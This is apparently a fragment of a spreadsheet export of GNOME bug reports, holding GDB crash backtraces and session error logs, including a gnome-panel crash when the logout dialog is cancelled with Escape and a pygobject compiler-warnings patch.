   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#45 0x0000003b392a959e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#46 0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#47 0x0000003b3720af19 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#48 0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#49 0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#50 0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#51 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#52 0x0000003b3932cf20 in gtk_main_do_event ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#53 0x0000003b39c31fea in uricmp () from /usr/lib64/libgdk-x11-2.0.so.0
No symbol table info available.
#54 0x0000003b39c3222b in gdk_window_process_all_updates ()
   from /usr/lib64/libgdk-x11-2.0.so.0
No symbol table info available.
#55 0x0000003b392a96d5 in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#56 0x0000003b3622d1f4 in g_main_context_dispatch ()
   from /lib64/libglib-2.0.so.0
No symbol table info available.
#57 0x0000003b3623002d in uricmp () from /lib64/libglib-2.0.so.0
No symbol table info available.
#58 0x0000003b3623033a in g_main_loop_run () from /lib64/libglib-2.0.so.0
No symbol table info available.
#59 0x0000003b3932d103 in gtk_main () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#60 0x000000000045e0e5 in main ()
No symbol table info available.
#0  0x0000003b3220d89f in waitpid () from /lib64/libpthread.so.0
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors (4536 sec old) ---------------------
err:toolbar:TOOLBAR_GetImageListForDrawing bitmap for ID 0 index 0 is not valid number of bitmaps in imagelist: 0
err:toolbar:TOOLBAR_GetImageListForDrawing bitmap for ID 0 index 0 is not valid number of bitmaps in imagelist: 0
CLIENT: Task: Task::done()
CLIENT: Task: emitting finished
LoadPlugin: failed to initialize shared library /home/alex/apps/firefox/plugins/libtotem-basic-plugin.so [/home/alex/apps/firefox/plugins/libtotem-basic-plugin.so: wrong ELF class: ELFCLASS64]
LoadPlugin: failed to initialize shared library /home/alex/apps/firefox/plugins/libtotem-complex-plugin.so [/home/alex/apps/firefox/plugins/libtotem-complex-plugin.so: wrong ELF class: ELFCLASS64]
LoadPlugin: failed to initialize shared library /home/alex/apps/firefox/plugins/libtotem-gmp-plugin.so [/home/alex/apps/firefox/plugins/libtotem-gmp-plugin.so: wrong ELF class: ELFCLASS64]
LoadPlugin: failed to initialize shared library /home/alex/apps/firefox/plugins/libtotem-mully-plugin.so [/home/alex/apps/firefox/plugins/libtotem-mully-plugin.so: wrong ELF class: ELFCLASS64]
LoadPlugin: failed to initialize shared library /home/alex/apps/firefox/plugins/libtotem-narrowspace-plugin.so [/home/alex/apps/firefox/plugins/libtotem-narrowspace-plugin.so: wrong ELF class: ELFCLAS
LoadPlugin: failed to initialize shared library /home/alex/apps/firefox/plugins/mplayerplug-in-dvx.so [/home/alex/apps/firefox/plugins/mplayerplug-in-dvx.so: wrong ELF class: ELFCLASS64]
LoadPlugin: failed to initialize shared library /home/alex/apps/firefox/plugins/mplayerplug-in-qt.so [/home/alex/apps/firefox/plugins/mplayerplug-in-qt.so: wrong ELF class: ELFCLASS64]
LoadPlugin: failed to initialize shared library /home/alex/apps/firefox/plugins/mplayerplug-in-rm.so [/home/alex/apps/firefox/plugins/mplayerplug-in-rm.so: wrong ELF class: ELFCLASS64]
LoadPlugin: failed to initialize shared library /home/alex/apps/firefox/plugins/mplayerplug-in-wmp.so [/home/alex/apps/firefox/plugins/mplayerplug-in-wmp.so: wrong ELF class: ELFCLASS64]
...Too much output ignoring rest...
--------------------------------------------------</t>
  </si>
  <si>
    <t>alexxed</t>
  </si>
  <si>
    <t>PYGOBJECT-668497</t>
  </si>
  <si>
    <t>Squash a few warnings</t>
  </si>
  <si>
    <t>Building pygobject with GCC 4.6.2 produces a small menagerie of warnings. These
patches squash a few of the more obvious ones.</t>
  </si>
  <si>
    <t>GNOME-PANEL-327993</t>
  </si>
  <si>
    <t>Panel crashes when pressing Escape on the logout/shut down dialog</t>
  </si>
  <si>
    <t xml:space="preserve">If I go to System / Logout and the cancel the dialog by pressing escape on the keyboard the panel crashes:
Backtrace was generated from '/usr/bin/gnome-panel'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1223850304 (LWP 5600)]
[New Thread -1227289680 (LWP 5611)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb777048b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7ea7592 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#3  
#4  IA__g_logv (log_domain= 
    log_level=G_LOG_LEVEL_ERROR 
    format=0xb77cd988 file %s: line %d (%s): should not be reached 
    args1=0xbfc15fdc \020Â²\v\bÂ¾) at gmessages.c:503
#5  0xb77a6c14 in IA__g_log (log_domain=0x89  
    log_level=137 format=0x89 )
    at gmessages.c:517
#6  0xb77a6c80 in IA__g_assert_warning (
    log_domain=0x89  
    file=0x89  line=137 
    pretty_function=0x80bb0c4 panel_logout_response expression=0x0)
    at gmessages.c:552
#7  0x080a7c52 in panel_logout_get_type ()
#8  0xb7814909 in IA__g_cclosure_marshal_VOID__INT (closure=0x81d8060 
    return_value=0x0 n_param_values=2 param_values=0xbfc1628c 
    invocation_hint=0xbfc1618c marshal_data=0x80a7bf1) at gmarshal.c:216
#9  0xb7807798 in IA__g_closure_invoke (closure=0x81d8060 return_value=0x89 
    n_param_values=137 param_values=0x89 invocation_hint=0x89)
    at gclosure.c:490
#10 0xb7817715 in signal_emit_unlocked_R (node=0x839ab40 detail=0 
    instance=0x83c1700 emission_return=0x0 instance_and_params=0xbfc1628c)
    at gsignal.c:2438
#11 0xb7819238 in IA__g_signal_emit_valist (instance=0x83c1700 
    signal_id=184 detail=0 var_args=) at gsignal.c:2197
#12 0xb7819589 in IA__g_signal_emit (instance=0x89 signal_id=137 detail=137)
    at gsignal.c:2241
#13 0xb7a08f2e in IA__gtk_dialog_response (dialog=0x83c1700 response_id=137)
    at gtkdialog.c:858
#14 0xb7a08fa2 in gtk_dialog_delete_event_handler (widget=0x89 
    event=0x81f7d60 user_data=0x0) at gtkdialog.c:320
#15 0xb7a81440 in _gtk_marshal_BOOLEAN__BOXED (closure=0x8399400 
    return_value=0xbfc16620 n_param_values=2 param_values=0xbfc1670c 
    invocation_hint=0xbfc1660c marshal_data=0xb7a08f89) at gtkmarshalers.c:83
#16 0xb7807798 in IA__g_closure_invoke (closure=0x8399400 return_value=0x89 
    n_param_values=137 param_values=0x89 invocation_hint=0x89)
    at gclosure.c:490
#17 0xb7817715 in signal_emit_unlocked_R (node=0x812f368 detail=0 
    instance=0x83c1700 emission_return=0xbfc1688c 
    instance_and_params=0xbfc1670c) at gsignal.c:2438
#18 0xb7818f94 in IA__g_signal_emit_valist (instance=0x83c1700 signal_id=46 
    detail=0 var_args=0xbfc16910 (iÃÂ¿`}\037\b) at gsignal.c:2207
#19 0xb7819589 in IA__g_signal_emit (instance=0x89 signal_id=137 detail=137)
    at gsignal.c:2241
#20 0xb7b634df in gtk_widget_event_internal (widget=0x83c1700 
    event=0x81f7d60) at gtkwidget.c:3735
#21 0xb7a80098 in IA__gtk_main_do_event (event=0x81f7d60) at gtkmain.c:1346
#22 0xb7a08666 in gtk_dialog_close (dialog=0x83c1700) at gtkdialog.c:429
#23 0xb7814663 in IA__g_cclosure_marshal_VOID__VOID (closure=0x83a31e8 
    return_value=0x0 n_param_values=1 param_values=0x83d1c50 
    invocation_hint=0xbfc16b3c marshal_data=0xb7a08617) at gmarshal.c:77
#24 0xb7807165 in g_type_class_meta_marshal (closure=0x83a31e8 
    return_value=0x89 n_param_values=137 param_values=0x83d1c50 
    invocation_hint=0x89 marshal_data=0x89) at gclosure.c:567
#25 0xb7807798 in IA__g_closure_invoke (closure=0x83a31e8 return_value=0x89 
    n_param_values=137 param_values=0x89 invocation_hint=0x89)
    at gclosure.c:490
#26 0xb7817e6e in signal_emit_unlocked_R (node=0x83a3200 detail=0 
    instance=0x83c1700 emission_return=0x0 instance_and_params=0x83d1c50)
    at gsignal.c:2476
#27 0xb7818770 in IA__g_signal_emitv (instance_and_params=0x83d1c50 
    signal_id=185 detail=0 return_value=0x0) at gsignal.c:2109
#28 0xb79bbffc in gtk_binding_entry_activate (entry=0x83a25b8 
    object=0x83c1700) at gtkbindings.c:526
#29 0xb79bcef7 in binding_match_activate (pspec_list= 
    object=0x83c1700 path_length=9 path=0x82dd7e0 GtkDialog 
    path_reversed=0x83af9e8 golaiDktG) at gtkbindings.c:928
#30 0xb79bd167 in gtk_bindings_activate_list (object=0x83c1700 
    entries=0x83a2028 is_release=0) at gtkbindings.c:1063
#31 0xb79bd357 in IA__gtk_bindings_activate_event (object=0x83c1700 
    event=0x81f7ae8) at gtkbindings.c:1139
#32 0xb7b63321 in gtk_widget_real_key_press_event (widget=0x89 event=0x89)
    at gtkwidget.c:3476
#33 0xb7b76e58 in gtk_window_key_press_event (widget=0x83c1700 
    event=0x81f7ae8) at gtkwindow.c:4551
#34 0xb7a81440 in _gtk_marshal_BOOLEAN__BOXED (closure=0x812f4b0 
    return_value=0xbfc16f60 n_param_values=2 param_values=0xbfc1704c 
    invocation_hint=0xbfc16f4c marshal_data=0xb7b76e03) at gtkmarshalers.c:83
#35 0xb7807165 in g_type_class_meta_marshal (closure=0x812f4b0 
    return_value=0x89 n_param_values=137 param_values=0xbfc1704c 
    invocation_hint=0x89 marshal_data=0x89) at gclosure.c:567
#36 0xb7807798 in IA__g_closure_invoke (closure=0x812f4b0 return_value=0x89 
    n_param_values=137 param_values=0x89 invocation_hint=0x89)
    at gclosure.c:490
#37 0xb7817e6e in signal_emit_unlocked_R (node=0x812f698 detail=0 
    instance=0x83c1700 emission_return=0xbfc171cc 
    instance_and_params=0xbfc1704c) at gsignal.c:2476
#38 0xb7818f94 in IA__g_signal_emit_valist (instance=0x83c1700 signal_id=49 
    detail=0 var_args=0xbfc17250 hrÃÂ¿Ã¨z\037\b) at gsignal.c:2207
#39 0xb7819589 in IA__g_signal_emit (instance=0x89 signal_id=137 detail=137)
    at gsignal.c:2241
#40 0xb7b634df in gtk_widget_event_internal (widget=0x83c1700 
    event=0x81f7ae8) at gtkwidget.c:3735
#41 0xb7a7fcc9 in IA__gtk_propagate_event (widget=0x83c1700 event=0x81f7ae8)
    at gtkmain.c:2149
#42 0xb7a7ffcb in IA__gtk_main_do_event (event=0x81f7ae8) at gtkmain.c:1412
#43 0xb7923c1c in gdk_event_dispatch (source=0x89 callback=0 user_data=0x0)
    at gdkevents-x11.c:2291
#44 0xb779e547 in IA__g_main_context_dispatch (context=0x80f92e8)
    at gmain.c:1916
#45 0xb77a1606 in g_main_context_iterate (context=0x80f92e8 block=1 
    dispatch=1 self=0x80c7ac0) at gmain.c:2547
#46 0xb77a1928 in IA__g_main_loop_run (loop=0x8252f50) at gmain.c:2751
#47 0xb7a7f2c5 in IA__gtk_main () at gtkmain.c:991
#48 0x08066697 in main ()
Thread 2 (Thread -1227289680 (LWP 5611)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb75ed934 in poll () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#2  0xb77a1458 in g_main_context_iterate (context=0x8273d28 block=1 
    dispatch=1 self=0x811f908) at gmain.c:2849
	max_priority = 2147483647
	timeout = -1
	some_ready = 
	nfds = 29
	allocated_nfds = 
	fds = (GPollFD *) 0x838bdc0
	__PRETTY_FUNCTION__ = g_main_context_iterate
#3  0xb77a1928 in IA__g_main_loop_run (loop=0x826c6c8) at gmain.c:2751
	got_ownership = -1216954784
	self = (GThread *) 0x811f908
	__PRETTY_FUNCTION__ = IA__g_main_loop_run
#4  0xb7c6f75e in link_thread_io_context () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#5  0xb77ba012 in g_thread_create_proxy (data=0x811f908) at gthread.c:582
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#6  0xb776a341 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#7  0xb75f755e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1223850304 (LWP 5600)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb777048b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7ea7592 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  IA__g_logv (log_domain= 
    log_level=G_LOG_LEVEL_ERROR 
    format=0xb77cd988 file %s: line %d (%s): should not be reached 
    args1=0xbfc15fdc \020Â²\v\bÂ¾) at gmessages.c:503
	depth = 1
	domain = (GLogDomain *) 0x0
	data = (gpointer) 0x0
	log_func = (GLogFunc) 0xb77a71b1 
	domain_fatal_mask = 5
	test_level = 
	was_fatal = 0
	was_recursion = 0
	i = 
#5  0xb77a6c14 in IA__g_log (log_domain=0x89  
    log_level=137 format=0x89 )
    at gmessages.c:517
	args = 0xbfc15fdc \020Â²\v\bÂ¾
#6  0xb77a6c80 in IA__g_assert_warning (
    log_domain=0x89  
    file=0x89  line=137 
    pretty_function=0x80bb0c4 panel_logout_response expression=0x0)
    at gmessages.c:552
No locals.
#7  0x080a7c52 in panel_logout_get_type ()
No symbol table info available.
#8  0xb7814909 in IA__g_cclosure_marshal_VOID__INT (closure=0x81d8060 
    return_value=0x0 n_param_values=2 param_values=0xbfc1628c 
    invocation_hint=0xbfc1618c marshal_data=0x80a7bf1) at gmarshal.c:216
	data1 = (gpointer) 0x83c1700
	data2 = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_cclosure_marshal_VOID__INT
#9  0xb7807798 in IA__g_closure_invoke (closure=0x81d8060 return_value=0x89 
    n_param_values=137 param_values=0x89 invocation_hint=0x89)
    at gclosure.c:490
	marshal = (
    GClosureMarshal) 0xb78148ac 
	marshal_data = (gpointer) 0x0
	in_marshal = 0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#10 0xb7817715 in signal_emit_unlocked_R (node=0x839ab40 detail=0 
    instance=0x83c1700 emission_return=0x0 instance_and_params=0xbfc1628c)
    at gsignal.c:2438
	tmp = 
	handler = (Handler *) 0x839cda0
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0xbfc16604 instance = 0x83c1700 ihint = {
    signal_id = 184 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x83a31b8
	handler_list = (Handler *) 0x839cda0
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 184
	max_sequential_handler_number = 3148
	return_value_altered = 0
#11 0xb7819238 in IA__g_signal_emit_valist (instance=0x83c1700 
    signal_id=184 detail=0 var_args=) at gsignal.c:2197
	_flags = 
	_vtable = 
	_cvalues = {{v_int = -4 v_long = -4 v_int64 = 4294967292 
    v_double = 2.1219957889890097e-314 v_pointer = 0xfffffffc} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 0 data = {{v_int = 225 v_uint = 225 
      v_long = 225 v_ulong = 225 v_int64 = -5224226523241774879 
      v_uint64 = 13222517550467776737 v_float = 3.15292154e-43 
      v_double = -2.282899118808627e-41 v_pointer = 0xe1} {
      v_int = -1077844936 v_uint = 3217122360 v_long = -1077844936 
      v_ulong = 3217122360 v_int64 = -4629308798601698248 
      v_uint64 = 13817435275107853368 v_float = -1.51087093 
      v_double = -0.13586959231432316 v_pointer = 0xbfc16438}}}
	error = 
	instance_and_params = (GValue *) 0xbfc1628c
	stack_values = {{g_type = 138028696 data = {{v_int = 138155776 
        v_uint = 138155776 v_long = 138155776 v_ulong = 138155776 
        v_int64 = 138155776 v_uint64 = 138155776 v_float = 5.66012285e-34 
        v_double = 6.8258022696138589e-316 v_pointer = 0x83c1700} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 24 data = {{v_int = -4 v_uint = 4294967292 v_long = -4 
        v_ulong = 4294967292 v_int64 = 4294967292 v_uint64 = 4294967292 
        v_float = -nan(0x7ffffc) v_double = 2.1219957889890097e-314 
        v_pointer = 0xfffffffc} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
        v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
        v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
        v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = -5205323684977311744 
        v_uint64 = 13241420388732239872 v_float = 0 
        v_double = -4.3565248217087103e-40 v_pointer = 0x0}}} {
    g_type = 137895312 data = {{v_int = 137895312 v_uint = 137895312 
        v_long = 137895312 v_ulong = 137895312 
        v_int64 = -4629309918372422256 v_uint64 = 13817434155337129360 
        v_float = 5.54052365e-34 v_double = -0.13583851243332079 
        v_pointer = 0x8381d90} {v_int = -1212777781 v_uint = 3082189515 
        v_long = -1212777781 v_ulong = 3082189515 
        v_int64 = 592255858393905867 v_uint64 = 592255858393905867 
        v_float = -2.17532706e-05 v_double = 4.5647812052722213e-269 
        v_pointer = 0xb7b67acb}}} {g_type = 3082958616 data = {{
        v_int = -1077845188 v_uint = 3217122108 v_long = -1077845188 
        v_ulong = 3217122108 v_int64 = -5223565086471134404 
        v_uint64 = 13223178987238417212 v_float = -1.51084089 
        v_double = -2.6071042957580055e-41 v_pointer = 0xbfc1633c} {
        v_int = 138215140 v_uint = 138215140 v_long = 138215140 
        v_ulong = 138215140 v_int64 = 8728149732 v_uint64 = 8728149732 
        v_float = 5.68738146e-34 v_double = 4.3122789343396829e-314 
        v_pointer = 0x83cfee4}}} {g_type = 1 data = {{v_int = -1211958864 
        v_uint = 3083008432 v_long = -1211958864 v_ulong = 3083008432 
        v_int64 = -4629309554650056272 v_uint64 = 13817434519059495344 
        v_float = -2.3242872e-05 v_double = -0.13584860775695295 
        v_pointer = 0xb7c2f9b0} {v_int = 137895312 v_uint = 137895312 
        v_long = 137895312 v_ulong = 137895312 
        v_int64 = -4629309643494515312 v_uint64 = 13817434430215036304 
        v_float = 5.54052365e-34 v_double = -0.13584614182785204 
        v_pointer = 0x8381d90}}} {g_type = 3082189755 data = {{
        v_int = 137895312 v_uint = 137895312 v_long = 137895312 
        v_ulong = 137895312 v_int64 = 581727859814964624 
        v_uint64 = 581727859814964624 v_float = 5.54052365e-34 
        v_double = 8.8551573985344327e-270 v_pointer = 0x8381d90} {
        v_int = -1077845160 v_uint = 3217122136 v_long = -1077845160 
        v_ulong = 3217122136 v_int64 = -5223562595390102696 
        v_uint64 = 13223181478319448920 v_float = -1.51084423 
        v_double = -2.6083742224913141e-41 v_pointer = 0xbfc16358}}} {
    g_type = 3082958616 data = {{v_int = -1212008680 v_uint = 3082958616 
        v_long = -1212008680 v_ulong = 3082958616 
        v_int64 = -4629309623369582824 v_uint64 = 13817434450339968792 
        v_float = -2.31522572e-05 v_double = -0.13584670040693747 
        v_pointer = 0xb7c23718} {v_int = 83 v_uint = 83 v_long = 83 
        v_ulong = 83 v_int64 = 1060856922195 v_uint64 = 1060856922195 
        v_float = 1.16307773e-43 v_double = 5.2413296040942971e-312 
        v_pointer = 0x53}}} {g_type = 3078607272 data = {{
        v_int = -1077845128 v_uint = 3217122168 v_long = -1077845128 
        v_ulong = 3217122168 v_int64 = -5236133127146871944 
        v_uint64 = 13210610946562679672 v_float = -1.51084805 
        v_double = -3.8596405587887371e-42 v_pointer = 0xbfc16378} {
        v_int = -1077845040 v_uint = 3217122256 v_long = -1077845040 
        v_ulong = 3217122256 v_int64 = 582635990779257808 
        v_uint64 = 582635990779257808 v_float = -1.51085854 
        v_double = 1.0381923770718478e-269 v_pointer = 0xbfc163d0}}} {
    g_type = 135655512 data = {{v_int = 18 v_uint = 18 v_long = 18 
        v_ulong = 18 v_int64 = -5206002942645108718 
        v_uint64 = 13240741131064442898 v_float = 2.52233724e-44 
        v_double = -3.8024794348839788e-40 v_pointer = 0x12} {
        v_int = -1077845012 v_uint = 3217122284 v_long = -1077845012 
        v_ulong = 3217122284 v_int64 = -4629309021939997716 
        v_uint64 = 13817435051769553900 v_float = -1.51086187 
        v_double = -0.13586339343126441 v_pointer = 0xbfc163ec}}} {
    g_type = 3081579215 data = {{v_int = -1077845040 v_uint = 3217122256 
        v_long = -1077845040 v_ulong = 3217122256 
        v_int64 = 582633826115740624 v_uint64 = 582633826115740624 
        v_float = -1.51085854 v_double = 1.0378284498856735e-269 
        v_pointer = 0xbfc163d0} {v_int = 34 v_uint = 34 v_long = 34 
        v_ulong = 34 v_int64 = 120259084322 v_uint64 = 120259084322 
        v_float = 4.76441478e-44 v_double = 5.9415882163825857e-313 
        v_pointer = 0x22}}} {g_type = 3081578856 data = {{
        v_int = -1216954761 v_uint = 3078012535 v_long = -1216954761 
        v_ulong = 3078012535 v_int64 = -4629309296957014409 
        v_uint64 = 13817434776752537207 v_float = -1.47070887e-05 
        v_double = -0.135855760175662 v_pointer = 0xb776be77} {
        v_int = -1214517575 v_uint = 3080449721 v_long = -1214517575 
        v_ulong = 3080449721 v_int64 = 592255858392166073 
        v_uint64 = 592255858392166073 v_float = -1.85886038e-05 
        v_double = 4.5647812041022319e-269 v_pointer = 0xb79beeb9}}} {
    g_type = 3217122364 data = {{v_int = -1212008680 v_uint = 3082958616 
        v_long = -1212008680 v_ulong = 3082958616 
        v_int64 = -5223565086605297896 v_uint64 = 13223178987104253720 
        v_float = -2.31522572e-05 v_double = -2.6071042273628778e-41 
        v_pointer = 0xb7c23718} {v_int = 198 v_uint = 198 v_long = 198 
        v_ulong = 198 v_int64 = -5226780997990743866 
        v_uint64 = 13219963075718807750 v_float = 2.77457096e-43 
        v_double = -1.6317770292446918e-41 v_pointer = 0xc6}}} {
    g_type = 3217122264 data = {{v_int = -1216125080 v_uint = 3078842216 
        v_long = -1216125080 v_ulong = 3078842216 v_int64 = 3078842216 
        v_uint64 = 3078842216 v_float = -1.56645692e-05 
        v_double = 1.5211501678913347e-314 v_pointer = 0xb7836768} {
        v_int = 2 v_uint = 2 v_long = 2 v_ulong = 2 
        v_int64 = -4629309025157119998 v_uint64 = 13817435048552431618 
        v_float = 2.80259693e-45 v_double = -0.13586330413818365 
        v_pointer = 0x2}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0xbfc162a0
	node = (SignalNode *) 0x839ab40
	i = 1
	n_params = 1
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#12 0xb7819589 in IA__g_signal_emit (instance=0x89 signal_id=137 detail=137)
    at gsignal.c:2241
	var_args = 0xbfc1648c Ã¼Ã¿Ã¿Ã¿Â°Ã¹Ã‚Â·\211\217 Â·Â¨dÃÂ¿Â¢\217 Â·
#13 0xb7a08f2e in IA__gtk_dialog_response (dialog=0x83c1700 response_id=137)
    at gtkdialog.c:858
	__PRETTY_FUNCTION__ = IA__gtk_dialog_response
#14 0xb7a08fa2 in gtk_dialog_delete_event_handler (widget=0x89 
    event=0x81f7d60 user_data=0x0) at gtkdialog.c:320
No locals.
#15 0xb7a81440 in _gtk_marshal_BOOLEAN__BOXED (closure=0x8399400 
    return_value=0xbfc16620 n_param_values=2 param_values=0xbfc1670c 
    invocation_hint=0xbfc1660c marshal_data=0xb7a08f89) at gtkmarshalers.c:83
	data1 = (gpointer) 0x83c1700
	data2 = 
	v_return = 
	__PRETTY_FUNCTION__ = _gtk_marshal_BOOLEAN__BOXED
#16 0xb7807798 in IA__g_closure_invoke (closure=0x8399400 return_value=0x89 
    n_param_values=137 param_values=0x89 invocation_hint=0x89)
    at gclosure.c:490
	marshal = (GClosureMarshal) 0xb7a813e8 
	marshal_data = (gpointer) 0x0
	in_marshal = 0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#17 0xb7817715 in signal_emit_unlocked_R (node=0x812f368 detail=0 
    instance=0x83c1700 emission_return=0xbfc1688c 
    instance_and_params=0xbfc1670c) at gsignal.c:2438
	tmp = 
	handler = (Handler *) 0x839ce20
	accumulator = (SignalAccumulator *) 0x8110588
	emission = {next = 0xbfc16b34 instance = 0x83c1700 ihint = {
    signal_id = 46 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x812f420
	handler_list = (Handler *) 0x839ce20
	return_accu = (GValue *) 0xbfc16620
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 46
	max_sequential_handler_number = 3148
	return_value_altered = 0
#18 0xb7818f94 in IA__g_signal_emit_valist (instance=0x83c1700 signal_id=46 
    detail=0 var_args=0xbfc16910 (iÃÂ¿`}\037\b) at gsignal.c:2207
	_flags = 
	_vtable = 
	_cvalues = {{v_int = 136281440 v_long = 136281440 
    v_int64 = 136281440 v_double = 6.733197766977509e-316 
    v_pointer = 0x81f7d60} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer = 0x0} {v_int = 0 v_long = 0 v_int64 = 0 
    v_double = 0 v_pointer = 0x0}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0}}}
	error = 
	instance_and_params = (GValue *) 0xbfc1670c
	stack_values = {{g_type = 138028696 data = {{v_int = 138155776 
        v_uint = 138155776 v_long = 138155776 v_ulong = 138155776 
        v_int64 = 138155776 v_uint64 = 138155776 v_float = 5.66012285e-34 
        v_double = 6.8258022696138589e-316 v_pointer = 0x83c1700} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 135019328 data = {{v_int = 136281440 v_uint = 136281440 
        v_long = 136281440 v_ulong = 136281440 v_int64 = 136281440 
        v_uint64 = 136281440 v_float = 4.79946997e-34 
        v_double = 6.733197766977509e-316 v_pointer = 0x81f7d60} {
        v_int = 134217728 v_uint = 134217728 v_long = 134217728 
        v_ulong = 134217728 v_int64 = 134217728 v_uint64 = 134217728 
        v_float = 3.85185989e-34 v_double = 6.631236846766476e-316 
